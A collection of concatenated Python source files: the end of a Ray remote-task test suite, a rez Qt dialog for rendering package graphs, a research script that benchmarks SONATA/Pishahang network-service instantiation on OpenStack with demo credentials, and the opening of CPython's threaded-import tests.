ray.get(use_actor_handle.remote(test_actor))
# Check that exceptions are deferred until ray.get().
exception_str = "test_advanced remote task exception"
@ray.remote
def throws():
raise Exception(exception_str)
obj = throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
# Check that multiple return values are handled properly.
@ray.remote(num_return_vals=3)
def returns_multiple():
return 1, 2, 3
obj1, obj2, obj3 = returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
obj1, obj2, obj3 = test_actor.returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
@ray.remote(num_return_vals=2)
def returns_multiple_throws():
raise Exception(exception_str)
obj1, obj2 = returns_multiple_throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
ray.get(obj1)
with pytest.raises(Exception, match=exception_str):
ray.get(obj2)
# Check that Actors are not overwritten by remote calls from different
# classes.
@ray.remote
class RemoteActor1:
def __init__(self):
pass
def function1(self):
return 0
@ray.remote
class RemoteActor2:
def __init__(self):
pass
def function2(self):
return 1
actor1 = RemoteActor1.remote()
_ = RemoteActor2.remote()
assert ray.get(actor1.function1.remote()) == 0
# Test passing ObjectIDs.
@ray.remote
def direct_dep(input):
return input
@ray.remote
def indirect_dep(input):
return ray.get(direct_dep.remote(input[0]))
assert ray.get(indirect_dep.remote(["hello"])) == "hello"
def test_wait_makes_object_local(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
@ray.remote
class Foo:
def method(self):
return np.zeros(1024 * 1024)
a = Foo.remote()
# Test get makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ray.get(x_id)
assert ray.worker.global_worker.core_worker.object_exists(x_id)
# Test wait makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ok, _ = ray.wait([x_id])
assert len(ok) == 1
assert ray.worker.global_worker.core_worker.object_exists(x_id)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
WriteGraphDialog.py
|
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
from Qt import QtCore, QtWidgets, QtGui
from rezgui.util import create_pane
from rez.utils.graph_utils import save_graph, prune_graph
import tempfile
import threading
import os
import os.path
class Writer(QtCore.QObject):
graph_written = QtCore.Signal(str, str)
def __init__(self, graph_str, filepath, prune_to=None):
super(Writer, self).__init__()
self.graph_str = graph_str
self.filepath = filepath
self.prune_to = prune_to
self.process = None
def cancel(self):
if self.process:
self.process.terminate()
def write_graph(self):
if self.prune_to:
graph_str = prune_graph(self.graph_str, self.prune_to)
else:
graph_str = self.graph_str
error_msg = ''
try:
save_graph(graph_str, self.filepath)
except Exception as e:
error_msg = str(e)
self.graph_written.emit(self.filepath, error_msg)
class WriteGraphDialog(QtWidgets.QDialog):
def __init__(self, graph_str, filepath, parent=None, prune_to=None):
super(WriteGraphDialog, self).__init__(parent)
self.setWindowTitle("Rendering graph...")
self.writer = Writer(graph_str, filepath, prune_to)
self.thread = None
self._finished = False
self.success = False
self.busy_cursor = QtGui.QCursor(QtCore.Qt.WaitCursor)
self.bar = QtWidgets.QProgressBar()
self.bar.setRange(0, 0)
self.cancel_btn = QtWidgets.QPushButton("Cancel")
pane = create_pane([None, self.cancel_btn], True)
create_pane([self.bar, pane], False, parent_widget=self)
self.writer.graph_written.connect(self._graph_written)
self.cancel_btn.clicked.connect(self._cancel)
def sizeHint(self):
return QtCore.QSize(300, 100)
def write_graph(self):
QtWidgets.QApplication.setOverrideCursor(self.busy_cursor)
self.thread = threading.Thread(target=self.writer.write_graph)
self.thread.daemon = True
self.thread.start()
self.exec_()
self.thread.join()
return self.success
def reject(self):
if self._finished:
super(WriteGraphDialog, self).reject()
else:
self._cancel()
def closeEvent(self, event):
if self._finished:
event.accept()
else:
self._cancel()
event.ignore()
def _cancel(self):
self.bar.setMaximum(10)
self.bar.setValue(10)
self.cancel_btn.setText("Cancelling...")
self.cancel_btn.setEnabled(False)
self.writer.cancel()
def _graph_written(self, filepath, error_message):
self._finished = True
self.bar.setMaximum(10)
self.bar.setValue(10)
QtWidgets.QApplication.restoreOverrideCursor()
self.setWindowTitle("Rendered graph")
if error_message:
QtWidgets.QMessageBox.critical(self, "Failed rendering resolve graph",
error_message)
elif filepath:
self.success = True
self.close()
graph_file_lookup = {}
def view_graph(graph_str, parent=None, prune_to=None):
"""View a graph."""
from rezgui.dialogs.ImageViewerDialog import ImageViewerDialog
from rez.config import config
# check for already written tempfile
h = hash((graph_str, prune_to))
filepath = graph_file_lookup.get(h)
if filepath and not os.path.exists(filepath):
filepath = None
# write graph to tempfile
if filepath is None:
suffix = ".%s" % config.dot_image_format
fd, filepath = tempfile.mkstemp(suffix=suffix, prefix="rez-graph-")
os.close(fd)
dlg = WriteGraphDialog(graph_str, filepath, parent, prune_to=prune_to)
if not dlg.write_graph():
return
# display graph
graph_file_lookup[h] = filepath
dlg = ImageViewerDialog(filepath, parent)
dlg.exec_()
|
run-emu-experiment-sonata copy.py
|
# import wrappers
# make method which does the following, take mano as parameter
# get start time
# sleep 5 min
# get NS instantiation time
# send instantiation request to osm/sonata
from wrappers import SONATAClient
import time
import json
import requests
from urllib.request import urlopen
import csv
import os
import docker
from dateutil import parser
import threading
from keystoneauth1.identity import v3
from keystoneauth1 import session
from heatclient import client as hclient
from novaclient import client as nvclient
docker_client = docker.DockerClient(base_url='unix://container/path/docker.sock')
DOCKER_EXCLUDE = []
IDLE_SLEEP = 1
# NS_TERMINATION_SLEEP = 20
# REQUESTS_PER_MINUTE = 15
INTER_EXPERIMENT_SLEEP = 60
NO_ACTIVITY_COUNT = 1
USERNAME = "pishahang"
PASSWORD = "1234"
HOST_URL = "thesismano4.cs.upb.de"
APP_SERVER_PORT = 5055
AUTH_URL = "http://131.234.29.169/identity/v3"
OS_USERNAME = "demo"
OS_PASSWORD = "1234"
EXPERIMENT_REFERENCE = "crazy-delay-10runs-2"
IMAGES = ["cirros"]
INSTANCES = [50]
CASES = [1]
RUNS = 3
# REQUESTS_PER_MINUTE = list(range(1000, 100000, 10000))
REQUESTS_PER_MINUTE = [3200]
IS_EXPERIMENT_VNF_INSTANCES_BASED = True
SKIP_EXPERIMENT_IF_ERRORS = True
cases_vnfs = {
1: 1,
2: 3,
3: 5
}
# 131.234.28.240:5000/del_requests
def remove_requests(host=HOST_URL, port=APP_SERVER_PORT) :
_base_path = 'http://{0}:{1}/del_requests'.format(host, port)
try:
r = requests.get(_base_path, verify=False)
print(r.text)
except Exception as e:
print("Scale debug could'nt be set")
def restart_pishahang(host=HOST_URL, port=APP_SERVER_PORT) :
_base_path = 'http://{0}:{1}/restart_pishahang'.format(host, port)
try:
r = requests.get(_base_path, verify=False)
print(r.text)
except Exception as e:
print("Restart Pishahang")
def sonata_cleanup():
print("Sonata NSD/VNFD Cleanup")
_token = json.loads(sonata_auth.auth(
username=USERNAME,
password=PASSWORD))
_token = json.loads(_token["data"])
nsd_list = json.loads(sonata_nsd.get_ns_descriptors(
token=_token["token"]["access_token"], limit=1000))
nsd_list = json.loads(nsd_list["data"])
print(len(nsd_list))
for _nsd in nsd_list:
sonata_nsd.delete_ns_descriptors_nsdinfoid(
token=_token["token"]["access_token"],
nsdinfoid=_nsd["uuid"])
nsd_list = json.loads(sonata_nsd.get_ns_descriptors(
token=_token["token"]["access_token"]))
nsd_list = json.loads(nsd_list["data"])
# Delete VNFDs
vnf_list = json.loads(sonata_vnfpkgm.get_vnf_packages(
token=_token["token"]["access_token"], limit=1000))
vnf_list = json.loads(vnf_list["data"])
for _vnfd in vnf_list:
sonata_vnfpkgm.delete_vnf_packages_vnfpkgid(token=_token["token"]["access_token"], vnfPkgId=_vnfd["uuid"])
vnf_list = json.loads(sonata_vnfpkgm.get_vnf_packages(
token=_token["token"]["access_token"]))
vnf_list = json.loads(vnf_list["data"])
time.sleep(5)
def delete_stacks():
time.sleep(60)
auth = v3.Password(auth_url=AUTH_URL,
username=OS_USERNAME,
password=OS_PASSWORD,
project_name='demo',
user_domain_id='default',
project_domain_id='default')
sess = session.Session(auth=auth)
heat = hclient.Client('1', session=sess)
for s in heat.stacks.list():
try:
s.delete()
except Exception as e:
print(e)
def get_count_stack(init_time):
auth = v3.Password(auth_url=AUTH_URL,
username=OS_USERNAME,
password=OS_PASSWORD,
project_name='demo',
user_domain_id='default',
project_domain_id='default')
sess = session.Session(auth=auth)
heat = hclient.Client('1', session=sess)
active_count = 0
build_count = 0
error_count = 0
for _s in heat.stacks.list():
server_created = parser.parse(_s.creation_time)
if int(server_created.strftime("%s")) > int(init_time) :
print(_s.stack_status)
if _s.stack_status == "UPDATE_COMPLETE":
active_count += 1
elif _s.stack_status in ["UPDATE_IN_PROGRESS", "CREATE_COMPLETE"]:
build_count += 1
elif _s.stack_status in ["CREATE_FAILED", "UPDATE_FAILED"]:
error_count += 1
return active_count, build_count, error_count
def get_count(init_time, requests_list):
active_count = 0
build_count = 0
error_count = 0
for _r in requests_list:
server_created = parser.parse(_r['began_at'])
if int(server_created.strftime("%s")) >= int(init_time):
print(_r['status'])
if _r['status'] == "READY":
active_count += 1
elif _r['status'] == "INSTANTIATING":
build_count += 1
elif _r['status'] == "ERROR":
error_count += 1
else:
print("Other Status")
print(_r['status'])
return active_count, build_count, error_count
def get_individual_times(individual_init_times, folder_path, init_time, _ns_list):
auth = v3.Password(auth_url=AUTH_URL,
username=OS_USERNAME,
password=OS_PASSWORD,
project_name='demo',
user_domain_id='default',
project_domain_id='default')
sess = session.Session(auth=auth)
heat = hclient.Client('1', session=sess)
_servers = heat.stacks.list()
print(individual_init_times)
with open('{nit}/individual-build-times.csv'.format(nit=nit), 'w') as _file:
_file.write("id,mano_time,ns_mano_time,vim_time\n")
for _s in _servers:
if _s.status == "COMPLETE":
server_created = parser.parse(_s.creation_time)
launch_time = parser.parse(_s.updated_time)
if int(server_created.strftime("%s")) > int(init_time):
# ns_init_time = next((item for item in _ns_list if item["short-name"] == "{}-{}".format(_s.name.split("-")[0], _s.name.split("-")[1])), False)
# ns_init_time = next((item for item in _ns_list if item["short-name"] == "{}-{}".format(_s.name.split("-")[0], _s.name.split("-")[1])), False)
# if not ns_init_time:
# ns_init_time = 0
# else:
# ns_init_time = ns_init_time['crete-time']
# print(server_created.strftime("%s"), nsname, individual_init_times[int(_s.name.split("-")[1])])
_mano_time = float(server_created.strftime("%s")) - float(individual_init_times[0])
ns_mano_time = float(server_created.strftime("%s")) - float(individual_init_times[0])
# ns_mano_time = float(server_created.strftime("%s")) - float(ns_init_time)
_vim_time = float(launch_time.strftime("%s")) - float(server_created.strftime("%s"))
print("{},{},{},{}\n".format(_s.stack_name, _mano_time, ns_mano_time, _vim_time))
_file.write("{},{},{},{}\n".format(_s.stack_name, _mano_time, ns_mano_time, _vim_time))
else:
print("Not Complete")
return
# http://patorjk.com/software/taag/#p=display&h=1&v=1&f=ANSI%20Shadow&t=OSM%20%0AExperiment
print("""
██████╗ ██╗███████╗██╗ ██╗ █████╗ ██╗ ██╗ █████╗ ███╗ ██╗ ██████╗
██╔══██╗██║██╔════╝██║ ██║██╔══██╗██║ ██║██╔══██╗████╗ ██║██╔════╝
██████╔╝██║███████╗███████║███████║███████║███████║██╔██╗ ██║██║ ███╗
██╔═══╝ ██║╚════██║██╔══██║██╔══██║██╔══██║██╔══██║██║╚██╗██║██║ ██║
██║ ██║███████║██║ ██║██║ ██║██║ ██║██║ ██║██║ ╚████║╚██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝
███████╗██╗ ██╗██████╗ ███████╗██████╗ ██╗███╗ ███╗███████╗███╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██╔════╝██╔══██╗██║████╗ ████║██╔════╝████╗ ██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝█████╗ ██████╔╝██║██╔████╔██║█████╗ ██╔██╗ ██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██╔══╝ ██╔══██╗██║██║╚██╔╝██║██╔══╝ ██║╚██╗██║ ██║
███████╗██╔╝ ██╗██║ ███████╗██║ ██║██║██║ ╚═╝ ██║███████╗██║ ╚████║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝ ╚═╝
██████╗ ██╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝██║ ██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔══██╗██║ ██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║╚██████╔╝██║ ╚████║██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
""")
for _image in IMAGES:
for _case in CASES:
for _instances in INSTANCES:
for _rpm in REQUESTS_PER_MINUTE:
for _run in range(1, RUNS+1):
print("{image}_case{case}_{instances}_Run{run}".format(image=_image, case=_case, instances=_instances, run=_run))
# NO_INSTANCES = _instances
NSNAME = "{image}_case{case}-{_id}"
NSDESCRIPTION = "{image}_case{case}_{instances}_rpm{rpm}_Run{run}".format(image=_image, case=_case, instances=_instances, rpm=_rpm, run=_run)
NSD_PATH = "/app/SONATA/Descriptors/CASE{case}/{image}_case{case}_nsd_sonata.yml".format(image=_image, case=_case)
# VNFD_PATHS = ["/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.1.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.2.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.3.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.4.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.5.yml".format(image=_image, case=_case)]
with open(NSD_PATH, 'r') as file:
nsd_data = file.read()
# with open(VNFD_PATH, 'r') as file:
# vnfd_data = file.read()
sonata_nsd = SONATAClient.Nsd(HOST_URL)
sonata_nslcm = SONATAClient.Nslcm(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
sonata_vnfpkgm = SONATAClient.VnfPkgm(HOST_URL)
experiment_timestamps = {}
sonata_cleanup()
_token = json.loads(sonata_auth.auth(
username=USERNAME,
password=PASSWORD))
_token = json.loads(_token["data"])
for _c in range(1, 6):
# for _vnfd in VNFD_PATHS:
VNFD_PATH = "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd_{vnfid}.yml".format(image=_image, case=_case, vnfid=_c)
_res = sonata_vnfpkgm.post_vnf_packages(token=_token,
package_path=VNFD_PATH)
print(_res)
time.sleep(0.5)
if IS_EXPERIMENT_VNF_INSTANCES_BASED:
no_instantiate = int(_instances/cases_vnfs[_case])
else:
no_instantiate = _instances
print("Instantiating {0} NS instances".format(no_instantiate))
for i in range(0, no_instantiate):
with open("/tmp/" + NSNAME.format(_id=str(i), image=_image, case=_case) + "nsd.yml", "w") as _file:
_file.write(nsd_data.format(_id=i))
_res = sonata_nsd.post_ns_descriptors(token=_token,
package_path="/tmp/" + NSNAME.format(_id=str(i), image=_image, case=_case) + "nsd.yml")
# print(_res)
time.sleep(0.5)
print("PHASE 1 : Recording idle metrics...")
experiment_timestamps["start_time"] = int(time.time())
time.sleep(IDLE_SLEEP)
print("PHASE 2 : Starting Instantiation Sequence...")
experiment_timestamps["ns_inst_time"] = int(time.time())
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_nsd_list = json.loads(sonata_nsd.get_ns_descriptors(token=_token["token"]["access_token"], limit=1000))
_nsd_list = json.loads(_nsd_list["data"])
print(len(_nsd_list))
def createFolder(directory):
try:
if not os.path.exists(directory):
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
nit = "./EXP_RESULTS/{0}/{1}/{2}-{3}".format(EXPERIMENT_REFERENCE, no_instantiate, str(experiment_timestamps["ns_inst_time"]), NSDESCRIPTION)
createFolder("{nit}/".format(nit=nit))
experiment_complete = False
experiment_missing = 0
def successRatioThread():
global experiment_complete
global experiment_missing
# TIME_OUT = 60*NS_TERMINATION_SLEEP
TIME_OUT = no_instantiate * 60
QUERY_FREQUENCY = 10
COUNTER = 0
with open('{nit}/success-ratio.csv'.format(nit=nit), 'w') as _file:
_file.write("Time,Total,Active,Build,Error\n")
if IS_EXPERIMENT_VNF_INSTANCES_BASED:
TOTAL_INSTANCES = _instances
else:
TOTAL_INSTANCES = int(cases_vnfs[_case]*_instances)
_sr_old = "0,0,0"
_no_change_count = -1
while(COUNTER < TIME_OUT):
try:
_requests = json.loads(sonata_nslcm.get_ns_instances_request_status(
token=_token["token"]["access_token"], limit=1000))
_requests = json.loads(_requests["data"])
ACTIVE_INSTANCES, BUILD_INSTANCES, ERROR_INSTANCES = get_count(experiment_timestamps["ns_inst_time"], _requests)
experiment_missing = TOTAL_INSTANCES - ACTIVE_INSTANCES
_successratio = "{time},{total},{active},{build},{error}\n".format(
time=(int(time.time())),
total=(max(0, TOTAL_INSTANCES)),
active=(max(0, ACTIVE_INSTANCES)),
build=(max(0, BUILD_INSTANCES)),
error=(max(0, ERROR_INSTANCES)))
_sr_now = "{active},{build},{error}".format(
active=(max(0, ACTIVE_INSTANCES)),
build=(max(0, BUILD_INSTANCES)),
error=(max(0, ERROR_INSTANCES)))
if _sr_old == _sr_now:
_no_change_count += 1
print("No activity increased: ", str(_no_change_count))
if _no_change_count > NO_ACTIVITY_COUNT:
print("ERROR: Stopping due to no activity")
break
else:
_no_change_count = 0
print(_successratio)
print("###")
_sr_old = _sr_now
_file.write(_successratio)
if (ACTIVE_INSTANCES + ERROR_INSTANCES) == TOTAL_INSTANCES:
if ACTIVE_INSTANCES == TOTAL_INSTANCES:
experiment_complete = True
experiment_timestamps["end_to_end_lifecycle_time"] = int(time.time())-int(experiment_timestamps["ns_inst_time"])
print("END-TO-END Time {enetime}".format( enetime=experiment_timestamps["end_to_end_lifecycle_time"]))
break
if SKIP_EXPERIMENT_IF_ERRORS:
if ERROR_INSTANCES > 0:
print("Skipping Experiment Due To Errors")
break
experiment_timestamps["end_to_end_lifecycle_time"] = int(time.time())-int(experiment_timestamps["ns_inst_time"])
except Exception as e:
print(e)
print("ERROR OpenStack")
time.sleep(QUERY_FREQUENCY)
COUNTER += QUERY_FREQUENCY
successThread = threading.Thread(target=successRatioThread)
successThread.start()
individual_init_times = {}
for i in range(0, no_instantiate):
_ns = None
for _n in _nsd_list:
if NSNAME.format(_id=str(i), image=_image, case=_case) == _n['nsd']['name']:
_ns = _n['uuid']
# print("UUID")
# print(_ns)
continue
if _ns:
response = json.loads(
sonata_nslcm.post_ns_instances_nsinstanceid_instantiate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
# print("response")
# print(response)
individual_init_times[i] = time.time()
if response["error"]:
print("ERROR - no ns uuid")
else:
print("ERROR - no ns uuid")
#print(response)
# time.sleep(0.1) - 0.1 sleep not working with pishahang
time.sleep(60/_rpm)
# Helpers._delete_test_nsd("test_osm_cirros_2vnf_nsd")
experiment_timestamps["ns_inst_end_time"] = int(time.time())
print("PHASE 2 : Recording Metrics Post NS instantiation...")
successThread.join()
print("PHASE 3 : Starting Termination Sequence...")
experiment_timestamps["ns_term_start_time"] = int(time.time())
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_nsd_list = json.loads(sonata_nsd.get_ns_descriptors(
token=_token["token"]["access_token"], limit=1000))
_nsd_list = json.loads(_nsd_list["data"])
_ns_list = json.loads(sonata_nslcm.get_ns_instances(
token=_token["token"]["access_token"], limit=1000))
_ns_list = json.loads(_ns_list["data"])
# get_individual_times(individual_init_times, nit, experiment_timestamps["ns_inst_time"], _ns_list)
_ns = None
for _n in _nsd_list:
try:
if NSNAME.format(_id=str(i), image=_image, case=_case) == _n['nsd']['name']:
# TODO: Print status
for _n2 in _ns_list:
if _n['uuid'] == _n2['descriptor_reference']:
_ns = _n2['uuid']
response = json.loads(
sonata_nslcm.post_ns_instances_nsinstanceid_terminate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
except Exception as e:
print(e)
experiment_timestamps["ns_term_end_time"] = int(time.time())
print("PHASE 3 : Recording Metrics Post NS ...")
time.sleep(IDLE_SLEEP)
experiment_timestamps["end_time"] = int(time.time())
print("\n ########### FINISHED ########### \n")
print("Experiment Start Time {0}".format(experiment_timestamps["start_time"]))
print("Instantiation Start Time {0}".format(experiment_timestamps["ns_inst_time"]))
print("Instantiation End Time {0}".format(experiment_timestamps["ns_inst_end_time"]))
print("Termination Start Time {0}".format(experiment_timestamps["ns_term_start_time"]))
print("Termination End Time {0}".format(experiment_timestamps["ns_term_end_time"]))
print("Experiment End Time {0}".format(experiment_timestamps["end_time"]))
# TODO: Save all the data generated into csv file
# + Use before, after and fetch csv data from url as it is in the html file and write it to a file, named accordingly
# + Create a folder with the "ns_inst_time" as name
# 'http://osmmano.cs.upb.de:19999/api/v1/data?chart=system.cpu&format=csv&options=nonzero'
print("PHASE 4 : Saving Metrics ...")
_charts = {
"system-cpu" : {
"url": "http://{host}:19999/api/v1/data?chart=system.cpu&after={after}&before={before}&format=csv&options=nonzero".format(host=HOST_URL,after=experiment_timestamps["start_time"],before=experiment_timestamps["end_time"])
},
"system-load" : {
"url": "http://{host}:19999/api/v1/data?chart=system.load&after={after}&before={before}&format=csv&options=nonzero".format(host=HOST_URL, after=experiment_timestamps['start_time'], before=experiment_timestamps["end_time"])
},
"system-ram" : {
"url": "http://{host}:19999/api/v1/data?chart=system.ram&format=datasource&after={after}&before={before}&format=csv&options=nonzero".format(host=HOST_URL, after=experiment_timestamps['start_time'], before=experiment_timestamps["end_time"])
},
"system-net" : {
"url": "http://{host}:19999/api/v1/data?chart=system.net&format=datasource&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"])
},
"system-io" : {
"url": "http://{host}:19999/api/v1/data?chart=system.io&format=datasource&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"])
}
}
docker_list = {}
for _container in docker_client.containers.list():
if not _container.attrs["Name"][1:] in DOCKER_EXCLUDE:
_charts["{0}-{1}".format(_container.attrs["Name"][1:], "cpu")] = { "url" : "http://{host}:19999/api/v1/data?chart=cgroup_{_name}.cpu&format=csv&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"], _name=_container.attrs["Name"][1:])}
_charts["{0}-{1}".format(_container.attrs["Name"][1:], "throttle_io")] = { "url" : "http://{host}:19999/api/v1/data?chart=cgroup_{_name}.throttle_io&format=csv&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"], _name=_container.attrs["Name"][1:])}
_charts["{0}-{1}".format(_container.attrs["Name"][1:], "mem_usage")] = { "url" : "http://{host}:19999/api/v1/data?chart=cgroup_{_name}.mem_usage&format=csv&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"], _name=_container.attrs["Name"][1:])}
for _sc, value in _charts.items():
print(_sc)
try:
# TODO: make verify=false as a fallback
r = requests.get(value["url"], verify=False)
if r.status_code == requests.codes.ok:
print("success")
with open('{nit}/{sc}.csv'.format(nit=nit,sc=_sc), 'w') as csv_file:
csv_file.write(r.text)
else:
print("Failed")
except Exception as e:
print(str(e))
with open('{nit}/experiment-meta.md'.format(nit=nit), 'w') as _file:
_file.write("Experiment Description {0}\n\n".format(NSDESCRIPTION))
_file.write("Experiment Start Time {0}\n".format(experiment_timestamps["start_time"]))
_file.write("Instantiation Start Time {0}\n".format(experiment_timestamps["ns_inst_time"]))
_file.write("Instantiation End Time {0}\n".format(experiment_timestamps["ns_inst_end_time"]))
_file.write("Termination Start Time {0}\n".format(experiment_timestamps["ns_term_start_time"]))
_file.write("Termination End Time {0}\n".format(experiment_timestamps["ns_term_end_time"]))
_file.write("Experiment End Time {0}\n".format(experiment_timestamps["end_time"]))
_file.write("\nhttp://{host}:9000/interactive?host={host}&after={after}&before={before}&start_time={start_time}&ns_inst_time={ns_inst_time}&ns_inst_end_time={ns_inst_end_time}&ns_term_start_time={ns_term_start_time}&ns_term_end_time={ns_term_end_time}&end_time={end_time}&exp_description={exp_description}".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"],start_time=experiment_timestamps["start_time"],ns_inst_time=experiment_timestamps["ns_inst_time"],ns_inst_end_time=experiment_timestamps["ns_inst_end_time"],ns_term_start_time=experiment_timestamps["ns_term_start_time"],ns_term_end_time=experiment_timestamps["ns_term_end_time"],end_time=experiment_timestamps["end_time"],exp_description=NSDESCRIPTION))
with open('{nit}/end-to-end-time.csv'.format(nit=nit), 'w') as _file:
_file.write("end-to-end-time\n{0}".format(experiment_timestamps["end_to_end_lifecycle_time"]))
print("Metrics saved in folder {nit}".format(nit=nit))
print("\nhttp://{host}:9000/?host={host}&after={after}&before={before}&start_time={start_time}&ns_inst_time={ns_inst_time}&ns_inst_end_time={ns_inst_end_time}&ns_term_start_time={ns_term_start_time}&ns_term_end_time={ns_term_end_time}&end_time={end_time}&exp_description={exp_description}".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"],start_time=experiment_timestamps["start_time"],ns_inst_time=experiment_timestamps["ns_inst_time"],ns_inst_end_time=experiment_timestamps["ns_inst_end_time"],ns_term_start_time=experiment_timestamps["ns_term_start_time"],ns_term_end_time=experiment_timestamps["ns_term_end_time"],end_time=experiment_timestamps["end_time"],exp_description=NSDESCRIPTION))
print("\nhttp://{host}:9000/interactive?host={host}&after={after}&before={before}&start_time={start_time}&ns_inst_time={ns_inst_time}&ns_inst_end_time={ns_inst_end_time}&ns_term_start_time={ns_term_start_time}&ns_term_end_time={ns_term_end_time}&end_time={end_time}&exp_description={exp_description}".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"],start_time=experiment_timestamps["start_time"],ns_inst_time=experiment_timestamps["ns_inst_time"],ns_inst_end_time=experiment_timestamps["ns_inst_end_time"],ns_term_start_time=experiment_timestamps["ns_term_start_time"],ns_term_end_time=experiment_timestamps["ns_term_end_time"],end_time=experiment_timestamps["end_time"],exp_description=NSDESCRIPTION))
print("\n\n\n\n\n\n ENDED \n\n\n\n\n\n")
if experiment_complete:
os.rename(nit, "{nit}-Complete".format(nit=nit))
else:
os.rename(nit, "{nit}-{active}".format(nit=nit, active=experiment_missing))
# delete_stacks()
remove_requests()
restart_pishahang()
time.sleep(INTER_EXPERIMENT_SLEEP)
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import unittest
from test.support import (
verbose, import_module, run_unittest, TESTFN, reap_threads,
forget, unlink, rmtree)
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
def check_parallel_module_init(self):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
